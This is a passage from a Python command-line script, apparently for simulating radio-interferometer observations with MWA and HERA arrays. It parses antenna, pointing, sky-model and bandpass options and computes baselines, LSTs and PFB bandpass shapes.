antenna_element_group.add_argument('--groundplane', help='Height of antenna element above ground plane (in meters) [float]', default=None, type=float, dest='ground_plane')
obsparm_group = parser.add_argument_group('Observation setup', 'Parameters specifying the observation')
obsparm_group.add_argument('-f', '--freq', help='Foreground center frequency in Hz [float, Default=185e6]', default=185e6, type=float, dest='freq')
obsparm_group.add_argument('--dfreq', help='Frequency resolution in Hz [float, Default=40e3]', default=40e3, type=float, dest='freq_resolution')
obsparm_group.add_argument('--obs-mode', help='Observing mode [str, track/drift/drift-shift/custom]', default=None, type=str, dest='obs_mode', choices=['track', 'drift', 'dns', 'lstbin', 'custom'])
# obsparm_group.add_argument('--t-snap', help='Integration time (seconds) [float, Default=300.0]', default=5.0*60.0, type=float, dest='t_snap')
obsparm_group.add_argument('--nchan', help='Number of frequency channels [int, Default=256]', default=256, type=int, dest='n_channels')
obsparm_group.add_argument('--delayerr', dest='delayerr', type=float, default=0.0, help='RMS error in beamformer delays [ns], default=0')
obsparm_group.add_argument('--gainerr', dest='gainerr', type=float, default=0.0, help='RMS error in beamformer gains [dB], default=0')
obsparm_group.add_argument('--nrandom', dest='nrand', type=int, default=1, help='numner of random realizations of gains and/or delays, default=1')
# obsparm_group.add_argument('--lst-init', help='LST at beginning of observing run (hours) [float]', type=float, dest='lst_init', required=True, metavar='LST')
# obsparm_group.add_argument('--pointing-init', help='Pointing (RA, Dec) at beginning of observing run (degrees) [float]', type=float, dest='pointing_init', metavar=('RA', 'Dec'), required=True, nargs=2)
duration_group = parser.add_argument_group('Observing duration parameters', 'Parameters specifying observing duration')
duration_group.add_argument('--t-obs', help='Duration of observation [seconds]', dest='t_obs', default=None, type=float, metavar='t_obs')
duration_group.add_argument('--n-snap', help='Number of snapshots or records that make up the observation', dest='n_snaps', default=None, type=int, metavar='n_snapshots')
duration_group.add_argument('--t-snap', help='integration time of each snapshot [seconds]', dest='t_snap', default=None, type=float, metavar='t_snap')
snapshot_selection_group = parser.add_mutually_exclusive_group(required=True)
snapshot_selection_group.add_argument('--avg-drifts', dest='avg_drifts', action='store_true')
snapshot_selection_group.add_argument('--beam-switch', dest='beam_switch', action='store_true')
snapshot_selection_group.add_argument('--snap-sampling', dest='snapshot_sampling', default=None, type=int, nargs=1)
snapshot_selection_group.add_argument('--snap-pick', dest='pick_snapshots', default=None, type=int, nargs='*')
snapshot_selection_group.add_argument('--snap-range', dest='snapshots_range', default=None, nargs=2, type=int)
snapshot_selection_group.add_argument('--all-snaps', dest='all_snapshots', action='store_true')
pointing_group = parser.add_mutually_exclusive_group(required=True)
pointing_group.add_argument('--pointing-file', dest='pointing_file', type=str, nargs=1, default=None)
pointing_group.add_argument('--pointing-info', dest='pointing_info', type=float, nargs=3, metavar=('lst_init', 'ra_init', 'dec_init'))
processing_group = parser.add_argument_group('Processing arguments', 'Processing parameters')
processing_group.add_argument('--n-bins-blo', help='Number of bins for baseline orientations [int, Default=4]', default=4, type=int, dest='n_bins_baseline_orientation')
processing_group.add_argument('--bl-chunk-size', help='Baseline chunk size [int, Default=100]', default=100, type=int, dest='baseline_chunk_size')
processing_group.add_argument('--bl-chunk', help='Baseline chunk indices to process [int(s), Default=None: all chunks]', default=None, type=int, dest='bl_chunk', nargs='*')
processing_group.add_argument('--n-bl-chunks', help='Upper limit on baseline chunks to be processed [int, Default=None]', default=None, type=int, dest='n_bl_chunks')
processing_group.add_argument('--n-sky-sectors', help='Divide sky into sectors relative to zenith [int, Default=1]', default=1, type=int, dest='n_sky_sectors')
processing_group.add_argument('--bpw', help='Bandpass window shape [str, "rect"]', default='rect', type=str, dest='bpass_shape', choices=['rect', 'bnw', 'bhw'])
processing_group.add_argument('--f-pad', help='Frequency padding fraction for delay transform [float, Default=1.0]', type=float, dest='f_pad', default=1.0)
processing_group.add_argument('--coarse-channel-width', help='Width of coarse channel [int: number of fine channels]', dest='coarse_channel_width', default=32, type=int)
processing_group.add_argument('--bp-correct', help='Bandpass correction', dest='bp_correct', action='store_true')
processing_group.add_argument('--noise-bp-correct', help='Bandpass correction for Tsys', dest='noise_bp_correct', action='store_true')
processing_group.add_argument('--bpw-pad', help='Bandpass window padding length [int, Default=0]', dest='n_pad', default=0, type=int)
mpi_group = parser.add_mutually_exclusive_group(required=True)
mpi_group.add_argument('--mpi-on-src', action='store_true')
mpi_group.add_argument('--mpi-on-bl', action='store_true')
more_mpi_group = parser.add_mutually_exclusive_group(required=True)
more_mpi_group.add_argument('--mpi-async', action='store_true')
more_mpi_group.add_argument('--mpi-sync', action='store_true')
freq_flags_group = parser.add_argument_group('Frequency flagging', 'Parameters to describe flagging of bandpass')
freq_flags_group.add_argument('--flag-channels', help='Bandpass channels to be flagged. If bp_flag_repeat is set, bp_flag(s) will be forced in the range 0 <= flagged channel(s) < coarse_channel_width and applied to all coarse channels periodically [int, default=-1: no flag]', dest='flag_chan', nargs='*', default=-1, type=int)
freq_flags_group.add_argument('--bp-flag-repeat', help='If set, will repeat any flag_chan(s) for all coarse channels after converting flag_chan(s) to lie in the range 0 <= flagged channel(s) < coarse_channel_width using flag_chan modulo coarse_channel_width', action='store_true', dest='bp_flag_repeat')
freq_flags_group.add_argument('--flag-edge-channels', help='Flag edge channels in the band. If flag_repeat_edge_channels is set, specified number of channels leading and trailing the coarse channel edges are flagged. First number includes the coarse channel minimum while the second number does not. Otherwise, specified number of channels are flagged at the beginning and end of the band. [int,int Default=0,0]', dest='n_edge_flag', nargs=2, default=[0,0], metavar=('NEDGE1','NEDGE2'), type=int)
freq_flags_group.add_argument('--flag-repeat-edge-channels', help='If set, will flag the leading and trailing channels whose number is specified in n_edge_flag. Otherwise, will flag the beginning and end of the band.', action='store_true', dest='flag_repeat_edge_channels')
skymodel_group = parser.add_mutually_exclusive_group(required=True)
skymodel_group.add_argument('--ASM', action='store_true') # Diffuse (GSM) + Compact (NVSS+SUMSS) All-sky model
skymodel_group.add_argument('--DSM', action='store_true') # Diffuse all-sky model
skymodel_group.add_argument('--CSM', action='store_true') # Point source model (NVSS+SUMSS)
skymodel_group.add_argument('--SUMSS', action='store_true') # SUMSS catalog
skymodel_group.add_argument('--NVSS', action='store_true') # NVSS catalog
skymodel_group.add_argument('--MSS', action='store_true') # Molonglo Sky Survey
skymodel_group.add_argument('--GLEAM', action='store_true') # GLEAM catalog
skymodel_group.add_argument('--PS', action='store_true') # Point sources
skymodel_group.add_argument('--USM', action='store_true') # Uniform all-sky model
skymodel_group.add_argument('--HI-monopole', action='store_true') # Global EoR model
skymodel_group.add_argument('--HI-fluctuations', action='store_true') # HI EoR fluctuations
skymodel_group.add_argument('--HI-cube', action='store_true') # HI EoR simulation cube
skyparm_group = parser.add_argument_group('Sky Model Setup', 'Parameters describing sky model')
skyparm_group.add_argument('--flux-unit', help='Units of flux density [str, Default="Jy"]', type=str, dest='flux_unit', default='Jy', choices=['Jy','K'])
skyparm_group.add_argument('--lidz', help='Simulations of Adam Lidz', action='store_true')
skyparm_group.add_argument('--21cmfast', help='21CMFAST Simulations of Andrei Mesinger', action='store_true')
skyparm_group.add_argument('--HI-monopole-parms', help='Parameters defining global HI signal', dest='global_HI_parms', default=None, type=float, nargs=3, metavar=('T_xi0', 'freq_half', 'dz_half'))
skycat_group = parser.add_argument_group('Catalog files', 'Catalog file locations')
skycat_group.add_argument('--dsm-file-prefix', help='Diffuse sky model filename prefix [str]', type=str, dest='DSM_file_prefix', default='/data3/t_nithyanandan/project_MWA/foregrounds/gsmdata')
skycat_group.add_argument('--sumss-file', help='SUMSS catalog file [str]', type=str, dest='SUMSS_file', default='/data3/t_nithyanandan/project_MWA/foregrounds/sumsscat.Mar-11-2008.txt')
skycat_group.add_argument('--nvss-file', help='NVSS catalog file [str]', type=file, dest='NVSS_file', default='/data3/t_nithyanandan/project_MWA/foregrounds/NVSS_catalog.fits')
skycat_group.add_argument('--GLEAM-file', help='GLEAM catalog file [str]', type=str, dest='GLEAM_file', default='/data3/t_nithyanandan/project_MWA/foregrounds/mwacs_b1_131016.csv')
skycat_group.add_argument('--PS-file', help='Point source catalog file [str]', type=str, dest='PS_file', default='/data3/t_nithyanandan/project_MWA/foregrounds/PS_catalog.txt')
# skycat_group.add_argument('--HI-file-prefix', help='EoR simulation filename [str]', type=str, dest='HI_file_prefix', default='/data3/t_nithyanandan/EoR_simulations/Adam_Lidz/Boom_tiles/hpxextn_138.915-195.235_MHz_80.0_kHz_nside_64.fits')
fgparm_group = parser.add_argument_group('Foreground Setup', 'Parameters describing foreground sky')
fgparm_group.add_argument('--spindex', help='Spectral index, ~ f^spindex [float, Default=0.0]', type=float, dest='spindex', default=-0.83)
fgparm_group.add_argument('--spindex-rms', help='Spectral index rms [float, Default=0.0]', type=float, dest='spindex_rms', default=0.0)
fgparm_group.add_argument('--spindex-seed', help='Spectral index seed [float, Default=None]', type=int, dest='spindex_seed', default=None)
fgparm_group.add_argument('--nside', help='nside parameter for healpix map [int, Default=64]', type=int, dest='nside', default=64, choices=[64, 128, 256])
parser.add_argument('--plots', help='Create plots', action='store_true', dest='plots')
args = vars(parser.parse_args())
project_MWA = args['project_MWA']
project_LSTbin = args['project_LSTbin']
project_HERA = args['project_HERA']
project_beams = args['project_beams']
project_drift_scan = args['project_drift_scan']
project_global_EoR = args['project_global_EoR']
if project_MWA: project_dir = 'project_MWA'
if project_LSTbin: project_dir = 'project_LSTbin'
if project_HERA: project_dir = 'project_HERA'
if project_beams: project_dir = 'project_beams'
if project_drift_scan: project_dir = 'project_drift_scan'
if project_global_EoR: project_dir = 'project_global_EoR'
telescope_id = args['telescope_id']
element_shape = args['antenna_element_shape']
element_size = args['antenna_element_size']
element_orientation = args['antenna_element_orientation']
element_ocoords = args['antenna_element_orientation_coords']
phased_array = args['phased_array']
phased_elements_file = args['phased_elements_file']
if (telescope_id == 'mwa') or (telescope_id == 'mwa_dipole'):
element_size = 0.74
element_shape = 'dipole'
if telescope_id == 'mwa': phased_array = True
elif telescope_id == 'vla':
element_size = 25.0
element_shape = 'dish'
elif telescope_id == 'gmrt':
element_size = 45.0
element_shape = 'dish'
elif telescope_id == 'hera':
element_size = 14.0
element_shape = 'dish'
elif telescope_id == 'custom':
if element_shape != 'delta':
if (element_shape is None) or (element_size is None):
raise ValueError('Both antenna element shape and size must be specified for the custom telescope type.')
elif element_size <= 0.0:
raise ValueError('Antenna element size must be positive.')
elif telescope_id == 'mwa_tools':
pass
else:
raise ValueError('telescope ID must be specified.')
if telescope_id == 'custom':
if element_shape == 'delta':
telescope_id = 'delta'
else:
telescope_id = '{0:.1f}m_{1:}'.format(element_size, element_shape)
if phased_array:
telescope_id = telescope_id + '_array'
telescope_str = telescope_id+'_'
if element_orientation is None:
if element_ocoords is not None:
if element_ocoords == 'altaz':
if (telescope_id == 'mwa') or (telescope_id == 'mwa_dipole') or (element_shape == 'dipole'):
element_orientation = NP.asarray([0.0, 90.0]).reshape(1,-1)
else:
element_orientation = NP.asarray([90.0, 270.0]).reshape(1,-1)
elif element_ocoords == 'dircos':
if (telescope_id == 'mwa') or (telescope_id == 'mwa_dipole') or (element_shape == 'dipole'):
element_orientation = NP.asarray([1.0, 0.0, 0.0]).reshape(1,-1)
else:
element_orientation = NP.asarray([0.0, 0.0, 1.0]).reshape(1,-1)
else:
raise ValueError('Invalid value specified antenna element orientation coordinate system.')
else:
if (telescope_id == 'mwa') or (telescope_id == 'mwa_dipole') or (element_shape == 'dipole'):
element_orientation = NP.asarray([0.0, 90.0]).reshape(1,-1)
else:
element_orientation = NP.asarray([90.0, 270.0]).reshape(1,-1)
element_ocoords = 'altaz'
else:
if element_ocoords is None:
raise ValueError('Antenna element orientation coordinate system must be specified to describe the specified antenna orientation.')
element_orientation = NP.asarray(element_orientation).reshape(1,-1)
if (element_orientation.size < 2) or (element_orientation.size > 3):
raise ValueError('Antenna element orientation must be a two- or three-element vector.')
elif (element_ocoords == 'altaz') and (element_orientation.size != 2):
raise ValueError('Antenna element orientation must be a two-element vector if using Alt-Az coordinates.')
ground_plane = args['ground_plane']
if ground_plane is None:
ground_plane_str = 'no_ground_'
else:
if ground_plane > 0.0:
ground_plane_str = '{0:.1f}m_ground_'.format(ground_plane)
else:
raise ValueError('Height of antenna element above ground plane must be positive.')
telescope = {}
if telescope_id in ['mwa', 'vla', 'gmrt', 'hera', 'mwa_dipole', 'mwa_tools']:
telescope['id'] = telescope_id
telescope['shape'] = element_shape
telescope['size'] = element_size
telescope['orientation'] = element_orientation
telescope['ocoords'] = element_ocoords
telescope['groundplane'] = ground_plane
antenna_file = args['antenna_file']
array_layout = args['array_layout']
minR = args['minR']
maxR = args['maxR']
if antenna_file is not None:
try:
ant_info = NP.loadtxt(antenna_file, skiprows=6, comments='#', usecols=(0,1,2,3))
ant_id = ant_info[:,0].astype(int).astype(str)
ant_locs = ant_info[:,1:]
except IOError:
raise IOError('Could not open file containing antenna locations.')
else:
if array_layout == 'MWA-128T':
ant_info = NP.loadtxt('/data3/t_nithyanandan/project_MWA/MWA_128T_antenna_locations_MNRAS_2012_Beardsley_et_al.txt', skiprows=6, comments='#', usecols=(0,1,2,3))
ant_id = ant_info[:,0].astype(int).astype(str)
ant_locs = ant_info[:,1:]
elif array_layout == 'HERA-7':
ant_locs, ant_id = RI.hexagon_generator(14.6, n_total=7)
elif array_layout == 'HERA-19':
ant_locs, ant_id = RI.hexagon_generator(14.6, n_total=19)
elif array_layout == 'HERA-37':
ant_locs, ant_id = RI.hexagon_generator(14.6, n_total=37)
elif array_layout == 'HERA-61':
ant_locs, ant_id = RI.hexagon_generator(14.6, n_total=61)
elif array_layout == 'HERA-91':
ant_locs, ant_id = RI.hexagon_generator(14.6, n_total=91)
elif array_layout == 'HERA-127':
ant_locs, ant_id = RI.hexagon_generator(14.6, n_total=127)
elif array_layout == 'HERA-169':
ant_locs, ant_id = RI.hexagon_generator(14.6, n_total=169)
elif array_layout == 'HERA-217':
ant_locs, ant_id = RI.hexagon_generator(14.6, n_total=217)
elif array_layout == 'HERA-271':
ant_locs, ant_id = RI.hexagon_generator(14.6, n_total=271)
elif array_layout == 'HERA-331':
ant_locs, ant_id = RI.hexagon_generator(14.6, n_total=331)
elif array_layout == 'CIRC':
ant_locs, ant_id = RI.circular_antenna_array(element_size, minR, maxR=maxR)
n_bins_baseline_orientation = args['n_bins_baseline_orientation']
baseline_chunk_size = args['baseline_chunk_size']
bl_chunk = args['bl_chunk']
n_bl_chunks = args['n_bl_chunks']
freq = args['freq']
freq_resolution = args['freq_resolution']
latitude = args['latitude']
if args['A_eff'] is None:
if (telescope['shape'] == 'dipole') or (telescope['shape'] == 'delta'):
A_eff = (0.5*FCNST.c/freq)**2
if (telescope_id == 'mwa') or phased_array:
A_eff *= 16
if telescope['shape'] == 'dish':
A_eff = NP.pi * (0.5*element_size)**2
else:
A_eff = args['A_eff']
obs_mode = args['obs_mode']
Tsys = args['Tsys']
t_snap = args['t_snap']
t_obs = args['t_obs']
n_snaps = args['n_snaps']
avg_drifts = args['avg_drifts']
beam_switch = args['beam_switch']
snapshot_sampling = args['snapshot_sampling']
pick_snapshots = args['pick_snapshots']
all_snapshots = args['all_snapshots']
snapshots_range = args['snapshots_range']
snapshot_type_str = ''
if avg_drifts and (obs_mode == 'dns'):
snapshot_type_str = 'drift_averaged_'
if beam_switch and (obs_mode == 'dns'):
snapshot_type_str = 'beam_switches_'
if (snapshots_range is not None) and ((obs_mode == 'dns') or (obs_mode == 'lstbin')):
snapshot_type_str = 'snaps_{0[0]:0d}-{0[1]:0d}_'.format(snapshots_range)
pointing_file = args['pointing_file']
if pointing_file is not None:
pointing_file = pointing_file[0]
pointing_info = args['pointing_info']
delayerr = args['delayerr']
if delayerr is None:
delayerr_str = ''
delayerr = 0.0
elif delayerr < 0.0:
raise ValueError('delayerr must be non-negative.')
else:
delayerr_str = 'derr_{0:.3f}ns'.format(delayerr)
delayerr *= 1e-9
gainerr = args['gainerr']
if gainerr is None:
gainerr_str = ''
gainerr = 0.0
elif gainerr < 0.0:
raise ValueError('gainerr must be non-negative.')
else:
gainerr_str = '_gerr_{0:.2f}dB'.format(gainerr)
nrand = args['nrand']
if nrand is None:
nrandom_str = ''
nrand = 1
elif nrand < 1:
raise ValueError('nrandom must be positive')
else:
nrandom_str = '_nrand_{0:0d}_'.format(nrand)
if (delayerr_str == '') and (gainerr_str == ''):
nrand = 1
nrandom_str = ''
delaygain_err_str = delayerr_str + gainerr_str + nrandom_str
element_locs = None
if phased_array:
try:
element_locs = NP.loadtxt(phased_elements_file, skiprows=1, comments='#', usecols=(0,1,2))
except IOError:
raise IOError('Could not open the specified file for phased array of antenna elements.')
if telescope_id == 'mwa':
xlocs, ylocs = NP.meshgrid(1.1*NP.linspace(-1.5,1.5,4), 1.1*NP.linspace(1.5,-1.5,4))
element_locs = NP.hstack((xlocs.reshape(-1,1), ylocs.reshape(-1,1), NP.zeros(xlocs.size).reshape(-1,1)))
if element_locs is not None:
telescope['element_locs'] = element_locs
duration_str = ''
if pointing_file is not None:
pointing_init = None
pointing_info_from_file = NP.loadtxt(pointing_file, comments='#', usecols=(1,2,3), delimiter=',')
obs_id = NP.loadtxt(pointing_file, comments='#', usecols=(0,), delimiter=',', dtype=str)
if (telescope_id == 'mwa') or (telescope_id == 'mwa_tools') or (phased_array):
delays_str = NP.loadtxt(pointing_file, comments='#', usecols=(4,), delimiter=',', dtype=str)
delays_list = [NP.fromstring(delaystr, dtype=float, sep=';', count=-1) for delaystr in delays_str]
delay_settings = NP.asarray(delays_list)
delay_settings *= 435e-12
delays = NP.copy(delay_settings)
if n_snaps is None:
n_snaps = pointing_info_from_file.shape[0]
pointing_info_from_file = pointing_info_from_file[:min(n_snaps, pointing_info_from_file.shape[0]),:]
obs_id = obs_id[:min(n_snaps, pointing_info_from_file.shape[0])]
if (telescope_id == 'mwa') or (telescope_id == 'mwa_tools') or (phased_array):
delays = delay_settings[:min(n_snaps, pointing_info_from_file.shape[0]),:]
n_snaps = min(n_snaps, pointing_info_from_file.shape[0])
pointings_altaz = pointing_info_from_file[:,:2].reshape(-1,2)
pointings_altaz_orig = pointing_info_from_file[:,:2].reshape(-1,2)
lst = 15.0 * pointing_info_from_file[:,2]
lst_wrapped = lst + 0.0
lst_wrapped[lst_wrapped > 180.0] = lst_wrapped[lst_wrapped > 180.0] - 360.0
lst_edges = NP.concatenate((lst_wrapped, [lst_wrapped[-1]+lst_wrapped[-1]-lst_wrapped[-2]]))
if obs_mode is None:
obs_mode = 'custom'
if (obs_mode == 'dns') and (avg_drifts or beam_switch):
angle_diff = GEOM.sphdist(pointings_altaz[1:,1], pointings_altaz[1:,0], pointings_altaz[:-1,1], pointings_altaz[:-1,0])
angle_diff = NP.concatenate(([0.0], angle_diff))
shift_threshold = 1.0 # in degrees
# lst_edges = NP.concatenate(([lst_edges[0]], lst_edges[angle_diff > shift_threshold], [lst_edges[-1]]))
lst_wrapped = NP.concatenate(([lst_wrapped[0]], lst_wrapped[angle_diff > shift_threshold], [lst_wrapped[-1]]))
n_snaps = lst_wrapped.size - 1
pointings_altaz = NP.vstack((pointings_altaz[0,:].reshape(-1,2), pointings_altaz[angle_diff>shift_threshold,:].reshape(-1,2)))
obs_id = NP.concatenate(([obs_id[0]], obs_id[angle_diff>shift_threshold]))
if (telescope_id == 'mwa') or (telescope_id == 'mwa_tools') or (phased_array):
delays = NP.vstack((delay_settings[0,:], delay_settings[angle_diff>shift_threshold,:]))
obs_mode = 'custom'
if avg_drifts:
lst_edges = NP.concatenate(([lst_edges[0]], lst_edges[angle_diff > shift_threshold], [lst_edges[-1]]))
else:
lst_edges_left = lst_wrapped[:-1] + 0.0
lst_edges_right = NP.concatenate(([lst_edges[1]], lst_edges[NP.asarray(NP.where(angle_diff > shift_threshold)).ravel()+1]))
elif snapshots_range is not None:
snapshots_range[1] = snapshots_range[1] % n_snaps
if snapshots_range[0] > snapshots_range[1]:
raise IndexError('min snaphost # must be <= max snapshot #')
lst_wrapped = lst_wrapped[snapshots_range[0]:snapshots_range[1]+2]
lst_edges = NP.copy(lst_wrapped)
pointings_altaz = pointings_altaz[snapshots_range[0]:snapshots_range[1]+1,:]
obs_id = obs_id[snapshots_range[0]:snapshots_range[1]+1]
if (telescope_id == 'mwa') or (telescope_id == 'mwa_tools') or (phased_array):
delays = delay_settings[snapshots_range[0]:snapshots_range[1]+1,:]
n_snaps = snapshots_range[1]-snapshots_range[0]+1
elif pick_snapshots is not None:
pick_snapshots = NP.asarray(pick_snapshots)
n_snaps = pick_snapshots.size
lst_begin = NP.asarray(lst_wrapped[pick_snapshots])
pointings_altaz = pointings_altaz[pick_snapshots,:]
obs_id = obs_id[pick_snapshots]
if (telescope_id == 'mwa') or (phased_array) or (telescope_id == 'mwa_tools'):
delays = delay_settings[pick_snapshots,:]
if obs_mode != 'lstbin':
lst_end = NP.asarray(lst_wrapped[pick_snapshots+1])
t_snap = (lst_end - lst_begin) / 15.0 * 3.6e3
# n_snaps = t_snap.size
lst = 0.5 * (lst_begin + lst_end)
obs_mode = 'custom'
else:
t_snap = 112.0 + NP.zeros(n_snaps) # in seconds (needs to be generalized)
lst = lst_wrapped + 0.5 * t_snap/3.6e3 * 15.0
if pick_snapshots is None:
if obs_mode != 'lstbin':
if not beam_switch:
lst = 0.5*(lst_edges[1:]+lst_edges[:-1])
t_snap = (lst_edges[1:]-lst_edges[:-1]) / 15.0 * 3.6e3
else:
lst = 0.5*(lst_edges_left + lst_edges_right)
t_snap = (lst_edges_right - lst_edges_left) / 15.0 * 3.6e3
else:
t_snap = 112.0 + NP.zeros(n_snaps) # in seconds (needs to be generalized)
lst = lst_wrapped + 0.5 * t_snap/3.6e3 * 15.0
# pointings_dircos_orig = GEOM.altaz2dircos(pointings_altaz_orig, units='degrees')
# pointings_hadec_orig = GEOM.altaz2hadec(pointings_altaz_orig, latitude, units='degrees')
# pointings_radec_orig = NP.hstack(((lst-pointings_hadec_orig[:,0]).reshape(-1,1), pointings_hadec_orig[:,1].reshape(-1,1)))
# pointings_radec_orig[:,0] = pointings_radec_orig[:,0] % 360.0
pointings_dircos = GEOM.altaz2dircos(pointings_altaz, units='degrees')
pointings_hadec = GEOM.altaz2hadec(pointings_altaz, latitude, units='degrees')
pointings_radec = NP.hstack(((lst-pointings_hadec[:,0]).reshape(-1,1), pointings_hadec[:,1].reshape(-1,1)))
pointings_radec[:,0] = pointings_radec[:,0] % 360.0
t_obs = NP.sum(t_snap)
elif pointing_info is not None:
pointing_init = NP.asarray(pointing_info[1:])
lst_init = pointing_info[0]
pointing_file = None
if t_snap is None:
raise NameError('t_snap must be provided for an automated observing run')
if (n_snaps is None) and (t_obs is None):
raise NameError('n_snaps or t_obs must be provided for an automated observing run')
elif (n_snaps is not None) and (t_obs is not None):
raise ValueError('Only one of n_snaps or t_obs must be provided for an automated observing run')
elif n_snaps is None:
n_snaps = int(t_obs/t_snap)
else:
t_obs = n_snaps * t_snap
t_snap = t_snap + NP.zeros(n_snaps)
lst = (lst_init + (t_snap/3.6e3) * NP.arange(n_snaps)) * 15.0 # in degrees
if obs_mode is None:
obs_mode = 'track'
if obs_mode == 'track':
pointings_radec = NP.repeat(NP.asarray(pointing_init).reshape(-1,2), n_snaps, axis=0)
else:
ha_init = lst_init * 15.0 - pointing_init[0]
pointings_radec = NP.hstack((NP.asarray(lst-ha_init).reshape(-1,1), pointing_init[1]+NP.zeros(n_snaps).reshape(-1,1)))
pointings_hadec = NP.hstack(((lst-pointings_radec[:,0]).reshape(-1,1), pointings_radec[:,1].reshape(-1,1)))
pointings_altaz = GEOM.hadec2altaz(pointings_hadec, latitude, units='degrees')
pointings_dircos = GEOM.altaz2dircos(pointings_altaz, units='degrees')
pointings_radec_orig = NP.copy(pointings_radec)
pointings_hadec_orig = NP.copy(pointings_hadec)
pointings_altaz_orig = NP.copy(pointings_altaz)
pointings_dircos_orig = NP.copy(pointings_dircos)
lst_wrapped = lst + 0.0
lst_wrapped[lst_wrapped > 180.0] = lst_wrapped[lst_wrapped > 180.0] - 360.0
if lst_wrapped.size > 1:
lst_edges = NP.concatenate((lst_wrapped, [lst_wrapped[-1]+lst_wrapped[-1]-lst_wrapped[-2]]))
else:
lst_edges = NP.concatenate((lst_wrapped, lst_wrapped+t_snap/3.6e3*15))
duration_str = '_{0:0d}x{1:.1f}s'.format(n_snaps, t_snap[0])
n_channels = args['n_channels']
bpass_shape = args['bpass_shape']
oversampling_factor = 1.0 + args['f_pad']
n_pad = args['n_pad']
pfb_method = args['pfb_method']
bandpass_correct = args['bp_correct']
noise_bandpass_correct = args['noise_bp_correct']
flag_chan = NP.asarray(args['flag_chan']).reshape(-1)
bp_flag_repeat = args['bp_flag_repeat']
coarse_channel_width = args['coarse_channel_width']
n_edge_flag = NP.asarray(args['n_edge_flag']).reshape(-1)
flag_repeat_edge_channels = args['flag_repeat_edge_channels']
nside = args['nside']
use_GSM = args['ASM']
use_DSM = args['DSM']
use_CSM = args['CSM']
use_NVSS = args['NVSS']
use_SUMSS = args['SUMSS']
use_MSS = args['MSS']
use_GLEAM = args['GLEAM']
use_PS = args['PS']
use_USM = args['USM']
use_HI_monopole = args['HI_monopole']
use_HI_fluctuations = args['HI_fluctuations']
use_HI_cube = args['HI_cube']
use_lidz = args['lidz']
use_21cmfast = args['21cmfast']
global_HI_parms = args['global_HI_parms']
if global_HI_parms is not None:
T_xi0 = global_HI_parms[0]
freq_half = global_HI_parms[1]
dz_half = global_HI_parms[2]
bl, bl_id = RI.baseline_generator(ant_locs, ant_id=ant_id, auto=False, conjugate=False)
bl, select_bl_ind, bl_count = RI.uniq_baselines(bl)
bl_id = bl_id[select_bl_ind]
bl_length = NP.sqrt(NP.sum(bl**2, axis=1))
bl_orientation = NP.angle(bl[:,0] + 1j * bl[:,1], deg=True)
sortind = NP.argsort(bl_length, kind='mergesort')
bl = bl[sortind,:]
bl_id = bl_id[sortind]
bl_length = bl_length[sortind]
bl_orientation = bl_orientation[sortind]
bl_count = bl_count[sortind]
neg_bl_orientation_ind = bl_orientation < 0.0
# neg_bl_orientation_ind = NP.logical_or(bl_orientation < -0.5*180.0/n_bins_baseline_orientation, bl_orientation > 180.0 - 0.5*180.0/n_bins_baseline_orientation)
bl[neg_bl_orientation_ind,:] = -1.0 * bl[neg_bl_orientation_ind,:]
bl_orientation = NP.angle(bl[:,0] + 1j * bl[:,1], deg=True)
maxlen = max(max(len(aid[0]), len(aid[1])) for aid in bl_id)
bl_id = [tuple(reversed(bl_id[i])) if neg_bl_orientation_ind[i] else bl_id[i] for i in xrange(bl_id.size)]
bl_id = NP.asarray(bl_id, dtype=[('A2', '|S{0:0d}'.format(maxlen)), ('A1', '|S{0:0d}'.format(maxlen))])
if use_HI_monopole:
bllstr = map(str, bl_length)
uniq_bllstr, ind_uniq_bll = NP.unique(bllstr, return_index=True)
count_uniq_bll = [bllstr.count(ubll) for ubll in uniq_bllstr]
count_uniq_bll = NP.asarray(count_uniq_bll)
bl = bl[ind_uniq_bll,:]
bl_id = bl_id[ind_uniq_bll]
bl_orientation = bl_orientation[ind_uniq_bll]
bl_length = bl_length[ind_uniq_bll]
sortind = NP.argsort(bl_length, kind='mergesort')
bl = bl[sortind,:]
bl_id = bl_id[sortind]
bl_length = bl_length[sortind]
bl_orientation = bl_orientation[sortind]
count_uniq_bll = count_uniq_bll[sortind]
total_baselines = bl_length.size
baseline_bin_indices = range(0,total_baselines,baseline_chunk_size)
try:
labels = bl_id.tolist()
except NameError:
labels = []
labels += [args['label_prefix']+'{0:0d}'.format(i+1) for i in xrange(bl.shape[0])]
if bl_chunk is None:
bl_chunk = range(len(baseline_bin_indices))
if n_bl_chunks is None:
n_bl_chunks = len(bl_chunk)
bl_chunk = bl_chunk[:n_bl_chunks]
mpi_on_src = args['mpi_on_src']
mpi_on_bl = args['mpi_on_bl']
mpi_async = args['mpi_async']
mpi_sync = args['mpi_sync']
plots = args['plots']
nchan = n_channels
base_bpass = 1.0*NP.ones(nchan)
bandpass_shape = 1.0*NP.ones(nchan)
chans = (freq + (NP.arange(nchan) - 0.5 * nchan) * freq_resolution)/ 1e9 # in GHz
bandpass_str = '{0:0d}x{1:.1f}_kHz'.format(nchan, freq_resolution/1e3)
flagged_edge_channels = []
pfb_str = ''
if pfb_method is not None:
if pfb_method == 'empirical':
bandpass_shape = DSP.PFB_empirical(nchan, 32, 0.25, 0.25)
elif pfb_method == 'theoretical':
pfbhdulist = fits.open(args['pfb_file'])
pfbdata = pfbhdulist[0].data
pfbfreq = pfbhdulist[1].data
pfb_norm = NP.amax(pfbdata, axis=0).reshape(1,-1)
pfbdata_norm = pfbdata - pfb_norm
pfbwin = 10 * NP.log10(NP.sum(10**(pfbdata_norm/10), axis=1))
freq_range = [0.9*chans.min(), 1.1*chans.max()]
useful_freq_range = NP.logical_and(pfbfreq >= freq_range[0]*1e3, pfbfreq <=freq_range[1]*1e3)
# pfb_interp_func = interpolate.interp1d(pfbfreq[useful_freq_range]/1e3, pfbwin[useful_freq_range])
# pfbwin_interp = pfb_interp_func(chans)
pfbwin_interp = NP.interp(chans, pfbfreq[useful_freq_range]/1e3, pfbwin[useful_freq_range])
bandpass_shape = 10**(pfbwin_interp/10)
if flag_repeat_edge_channels:
if NP.any(n_edge_flag > 0):
pfb_edge_channels = (bandpass_shape.argmin() + NP.arange(n_channels/coarse_channel_width)*coarse_channel_width) % n_channels
# pfb_edge_channels = bandpass_shape.argsort()[:int(1.0*n_channels/coarse_channel_width)]
# wts = NP.exp(-0.5*((NP.arange(bandpass_shape.size)-0.5*bandpass_shape.size)/4.0)**2)/(4.0*NP.sqrt(2*NP.pi))
# wts_shift = NP.fft.fftshift(wts)
# freq_wts = NP.fft.fft(wts_shift)
